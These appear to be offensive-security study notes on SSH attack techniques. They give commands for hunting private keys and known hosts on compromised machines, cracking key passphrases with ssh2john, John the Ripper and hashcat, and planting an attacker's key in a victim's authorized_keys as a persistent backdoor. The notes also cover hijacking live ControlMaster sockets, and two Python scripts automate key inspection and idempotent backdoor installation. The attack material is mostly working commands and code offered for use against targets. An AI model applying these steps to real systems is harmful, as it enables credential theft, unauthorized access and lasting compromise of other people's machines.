SSH

The public key is stored in ~/.ssh/authorized_keys on the server the user connects to.

The private key is typically stored in the ~/.ssh/ directory on the system the user connects from.

Enumeration

Default key names: find /home/ -name "id_rsa" (also look for id_dsa, id_ecdsa and id_ed25519, for *.key / *.pem files outside ~/.ssh, and in /root/.ssh if it is readable)

View the key to see if it is passphrase-protected: cat svuser.key. A legacy PEM key (-----BEGIN RSA PRIVATE KEY-----) shows Proc-Type: 4,ENCRYPTED and a DEK-Info: line when it is encrypted. A key in the newer format (-----BEGIN OPENSSH PRIVATE KEY-----) gives no visible hint, so run ssh-keygen -y -f svuser.key: it prints the public key straight away for an unencrypted key and prompts for a passphrase otherwise.

Check /etc/passwd to see whether the key's name matches a local user. If it does not, the key was most likely used to connect to another machine.

Then check ~/.ssh/known_hosts for recently connected hosts, and from the current session try to SSH to those hosts with the key as any user found so far (the key's name, the comment in the matching .pub file, local users).

If HashKnownHosts is set to yes in /etc/ssh/ssh_config, known_hosts stores hashed host names instead of readable ones. Fall back to ~/.bash_history (tail it for ssh and scp commands) to recover host names; ssh-keygen -F {hostname} then confirms whether a guessed host name has an entry in the hashed known_hosts.

Determine IP address of the host name: host {hostname}

Crack private key passphrase

python /usr/share/john/ssh2john.py svuser.key > svuser.hash
cat svuser.hash
The $sshng$N$ prefix of the hash records which cipher ssh2john found in the key; it determines the hashcat mode below:
$sshng$0$ stands for 3DES
$sshng$1$ stands for RSA, DSA keys using AES-128
$sshng$2$ stands for bcrypt PBKDF + AES-256-CBC / AES-256-CTR (the newer OpenSSH key format)
$sshng$3$ stands for EC keys using AES-128
$sshng$4$ stands for RSA, DSA keys using AES-192
$sshng$5$ stands for RSA, DSA keys using AES-256

JtR

sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./svuser.hash

Hashcat

hashcat -m {mode} svuser.hash /usr/share/wordlists/rockyou.txt
Pick the mode from the $sshng$N$ tag:
22911 - RSA/DSA/EC/OpenSSH Private Keys ($0$)
22921 - RSA/DSA/EC/OpenSSH Private Keys ($6$)
22931 - RSA/DSA/EC/OpenSSH Private Keys ($1$, $3$)
22941 - RSA/DSA/EC/OpenSSH Private Keys ($4$)
22951 - RSA/DSA/EC/OpenSSH Private Keys ($5$)
Mode 22921 expects the $6$ tag for bcrypt-KDF keys; if your ssh2john version tagged the key $2$, compare it against hashcat --example-hashes -m 22921 before running. Keys written by a current ssh-keygen (OpenSSH format, bcrypt KDF, 16 rounds by default) cost far more per guess than legacy PEM keys, so a small targeted wordlist beats rockyou there.
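To see what "is the key encrypted" (the cat svuser.key check above) and the $sshng$N$ tag actually come from, here is an added example that is not part of the original notes or of ssh2john: it reads the plaintext PEM headers of a legacy key, or decodes the binary header of a -----BEGIN OPENSSH PRIVATE KEY----- blob (cipher name, KDF name, bcrypt salt and rounds), and maps the result to the tag and the hashcat mode from the table above. The sample keys are constructed header-only stand-ins, not real keys, and the $2$ versus $6$ split for the bcrypt family is an assumption about ssh2john's numbering that you should confirm against your own ssh2john output.

```python
import base64
import re
import struct

# hashcat -m modes keyed by the N in ssh2john's $sshng$N$ tag, as tabulated on this page.
HASHCAT_MODE = {0: 22911, 1: 22931, 3: 22931, 4: 22941, 5: 22951, 6: 22921}

# Legacy PEM keys name their cipher in the DEK-Info header; EC keys under AES-128 get tag 3, not 1.
PEM_TAG = {"DES-EDE3-CBC": 0, "AES-128-CBC": 1, "AES-192-CBC": 4, "AES-256-CBC": 5}


def _ssh_string(blob, off):
    """Read one SSH wire-format string: 4-byte big-endian length, then the bytes."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n


def inspect_key(text):
    """Report whether and how a private key file is encrypted.

    Handles both on-disk formats OpenSSH writes: legacy PEM (encryption advertised
    in plaintext Proc-Type / DEK-Info headers) and the newer OPENSSH PRIVATE KEY
    blob, whose cipher and KDF names sit in a binary header after base64 decoding.
    """
    lines = [line.strip() for line in text.strip().splitlines()]
    if "BEGIN OPENSSH PRIVATE KEY" in lines[0]:
        blob = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("not an openssh-key-v1 blob")
        cipher, off = _ssh_string(blob, len(magic))
        kdf, off = _ssh_string(blob, off)
        kdfopts, off = _ssh_string(blob, off)
        info = {"format": "openssh", "cipher": cipher.decode(), "kdf": kdf.decode(),
                "encrypted": cipher != b"none"}
        if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
            salt, o = _ssh_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
            info.update(salt_len=len(salt), rounds=rounds)
        return info

    keytype = lines[0].strip("-").replace("BEGIN ", "").replace(" PRIVATE KEY", "")
    dek = re.search(r"^DEK-Info:\s*([A-Z0-9-]+),([0-9A-Fa-f]+)", text, re.M)
    return {"format": "pem", "keytype": keytype,
            "cipher": dek.group(1) if dek else "none",
            "encrypted": "Proc-Type: 4,ENCRYPTED" in text and dek is not None}


def sshng_tag(info):
    """Return the N that ssh2john would put in $sshng$N$, or None for an unencrypted key."""
    if not info["encrypted"]:
        return None
    if info["format"] == "pem":
        if info["keytype"] == "EC" and info["cipher"] == "AES-128-CBC":
            return 3
        return PEM_TAG.get(info["cipher"])
    # Newer format, bcrypt-pbkdf. Assumption: tag 6 for aes256-ctr (hashcat 22921) and
    # 2 for aes256-cbc, following ssh2john's numbering; confirm against your ssh2john output.
    if info["kdf"] == "bcrypt":
        return 6 if info["cipher"] == "aes256-ctr" else 2
    return None


def crack_plan(text):
    """Key inspection plus the tag and the matching hashcat mode (None = not in the table)."""
    info = inspect_key(text)
    tag = sshng_tag(info)
    return {**info, "tag": tag, "hashcat_mode": HASHCAT_MODE.get(tag)}


# --- constructed samples (not real keys): only the headers this parser reads are meaningful ---
def _sstr(b):
    return struct.pack(">I", len(b)) + b


def _openssh_sample(cipher, kdf, kdfopts):
    blob = b"openssh-key-v1\x00" + _sstr(cipher) + _sstr(kdf) + _sstr(kdfopts) + struct.pack(">I", 1)
    body = base64.b64encode(blob).decode()
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n" + body + "\n-----END OPENSSH PRIVATE KEY-----\n"


SAMPLE_OPENSSH_PLAIN = _openssh_sample(b"none", b"none", b"")
# bcrypt KDF with a 16-byte salt and 16 rounds, the ssh-keygen default
SAMPLE_OPENSSH_BCRYPT = _openssh_sample(b"aes256-ctr", b"bcrypt", _sstr(b"\x01" * 16) + struct.pack(">I", 16))
SAMPLE_PEM_AES128 = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for name, sample in [("openssh/plain", SAMPLE_OPENSSH_PLAIN),
                         ("openssh/bcrypt", SAMPLE_OPENSSH_BCRYPT),
                         ("pem/aes128", SAMPLE_PEM_AES128)]:
        print(name, crack_plan(sample))
```

Run it against a real file with crack_plan(open("svuser.key").read()); the rounds value is the number you are paying for on every guess with a bcrypt-KDF key.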

Usage

ssh -i ./svuser.key svuser@hostname

ssh refuses to use a private key that is readable by group or others (WARNING: UNPROTECTED PRIVATE KEY FILE!), so set it to 600 before connecting: chmod 600 user.key

Persistence

kali:
ssh-keygen
cat ~/.ssh/id_rsa.pub
victim:
mkdir -p /home/user/.ssh && chmod 700 /home/user/.ssh
echo "{id_rsa.pub}" >> /home/user/.ssh/authorized_keys
chmod 600 /home/user/.ssh/authorized_keys

# {user} = a user or root where we can write authorized_keys

sshd runs with StrictModes yes by default, which makes it ignore authorized_keys if the file, ~/.ssh or the home directory is writable by group or others or is not owned by the user (or root); 600 or 644 on the file both work. Before relying on the backdoor, also check /etc/ssh/sshd_config for PubkeyAuthentication, AuthorizedKeysFile, AllowUsers and, for root, PermitRootLogin (its default prohibit-password still allows key logins).

ssh user@victim
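The persistence steps above, as an added example written for these notes rather than taken from the course material: it installs the public key line exactly once, creates ~/.ssh and authorized_keys with the 700 / 600 modes sshd expects, and mirrors the ownership and write-permission checks that StrictModes applies to the home directory, ~/.ssh and the key file, so you can tell before you test the login why a key would be ignored. The public key line is a constructed placeholder, and demo() uses a temporary directory as a stand-in for /home/user.

```python
import os
import stat
import tempfile


def strict_modes_problems(home):
    """Mimic the checks sshd applies under StrictModes yes (the default) before it trusts
    ~/.ssh/authorized_keys: home, ~/.ssh and the file must exist, be owned by the user
    or root, and not be writable by group or others. Returns a list of findings."""
    owner = os.stat(home).st_uid
    problems = []
    for rel in ("", ".ssh", os.path.join(".ssh", "authorized_keys")):
        path = os.path.join(home, rel) if rel else home
        if not os.path.exists(path):
            problems.append(f"missing: {path}")
            continue
        st = os.stat(path)
        if st.st_uid not in (owner, 0):
            problems.append(f"wrong owner: {path}")
        if stat.S_IMODE(st.st_mode) & (stat.S_IWGRP | stat.S_IWOTH):
            problems.append(f"group/world writable: {path}")
    return problems


def install_authorized_key(home, pubkey_line):
    """Append one public key line to home/.ssh/authorized_keys exactly once, creating the
    directory and file with the modes sshd expects (700 / 600). Returns the file path."""
    ssh_dir = os.path.join(home, ".ssh")
    os.makedirs(ssh_dir, mode=0o700, exist_ok=True)
    os.chmod(ssh_dir, 0o700)  # makedirs honours umask, so set the mode explicitly
    keyfile = os.path.join(ssh_dir, "authorized_keys")
    pubkey_line = pubkey_line.strip()
    existing = []
    if os.path.exists(keyfile):
        with open(keyfile) as f:
            existing = [line.strip() for line in f]
    if pubkey_line not in existing:  # re-running must not stack duplicate lines
        with open(keyfile, "a") as f:
            f.write(pubkey_line + "\n")
    os.chmod(keyfile, 0o600)
    return keyfile


# Constructed public key line (not a real key); the trailing comment is free text.
SAMPLE_PUBKEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFakeFakeFakeFakeFakeFakeFakeFakeFakeFakeFake kali"


def demo():
    """Run the install twice in a throwaway temp home (stand-in for /home/user), then
    break the directory mode the way StrictModes catches, and return what happened."""
    home = tempfile.mkdtemp()
    install_authorized_key(home, SAMPLE_PUBKEY)
    install_authorized_key(home, SAMPLE_PUBKEY)  # second run must be a no-op
    ssh_dir = os.path.join(home, ".ssh")
    keyfile = os.path.join(ssh_dir, "authorized_keys")
    with open(keyfile) as f:
        lines = f.read().splitlines()
    result = {
        "lines": lines,
        "dir_mode": stat.S_IMODE(os.stat(ssh_dir).st_mode),
        "file_mode": stat.S_IMODE(os.stat(keyfile).st_mode),
        "problems_before": strict_modes_problems(home),
    }
    os.chmod(ssh_dir, 0o777)  # the classic mistake: a world-writable ~/.ssh
    result["problems_after"] = strict_modes_problems(home)
    return result


if __name__ == "__main__":
    print(demo())
```

On a real target call install_authorized_key("/home/user", pubkey) as that user or root and then strict_modes_problems("/home/user"); an empty list means the remaining reasons for a failed key login are in sshd_config, not in the file system.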

Hijacking

SSH's ControlMaster option lets later ssh connections reuse an already authenticated session through a Unix socket. The compromised user needs an active SSH connection to the intermediate server, and if we have compromised an account with root level access on the intermediate server, we can leverage the victim user's open ControlMaster socket directly and reach the next host without a password or key (PDF p.535).

Check ~/.ssh/config for ControlMaster / ControlPath entries (a common setting is ControlPath ~/.ssh/controlmaster/%r@%h:%p), then look in that directory for a live socket file. With the socket present, ssh to the same user@host as the victim (or point ssh's -S option at the socket) reuses the open session.

Check for live SSH connections and which user owns them: ps aux | grep ssh (and ls -la ~/.ssh/controlmaster/ for the sockets)
